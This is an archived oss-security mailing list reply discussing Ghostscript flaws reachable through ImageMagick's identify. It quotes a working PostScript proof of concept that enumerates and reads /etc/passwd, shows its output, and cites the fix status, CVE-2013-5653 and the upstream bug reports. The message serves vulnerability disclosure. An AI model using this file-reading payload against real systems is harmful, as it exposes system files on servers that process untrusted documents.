Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 29 Sep 2016 08:25:54 +0200
From: Florian Weimer <fw@...eb.enyo.de>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

* Tavis Ormandy:

> Here is the code I'm testing with (Note: I really don't know much
> postscript - and I hate it).
>
> $ cat test.ps
> /dumpname {
>     dup             % copy filename
>     dup             % copy filename
>     print           % print filename
>     (\n) print      % print newline
>     status          % stat filename
>     {
>         (stat succeeded\n) print
>         ( ctime:) print
>         64 string cvs print
>         ( atime:) print
>         64 string cvs print
>         ( size:) print
>         64 string cvs print
>         ( blocks:) print
>         64 string cvs print
>         (\n) print
>         (\n) print
>     }{
>         (unable to stat\n\n) print
>     } ifelse
>     .libfile        % open as library
>     {
>         (.libfile returned file\n\n) print
>         64 string readstring
>         pop         % discard result (should proably test)
>         print
>         (\n) print
>     }{
>         (.libfile returned string\n) print
>         print
>         (\n) print
>     } ifelse
> } def
>
> (/etc/pass*) /dumpname load 256 string filenameforall

filenameforall was fixed as part of this:

  http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
  http://bugs.ghostscript.com/show_bug.cgi?id=694724

This also covers getenv and has already been assigned CVE-2013-5653.

> $ identify test.ps
> /etc/passwd
> stat succeeded
>  ctime:1474998792 atime:1474998792 size:2662 blocks:8
>
> .libfile returned file

.libfile is not yet fixed upstream.  I reported this upstream:

  http://bugs.ghostscript.com/show_bug.cgi?id=697169

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ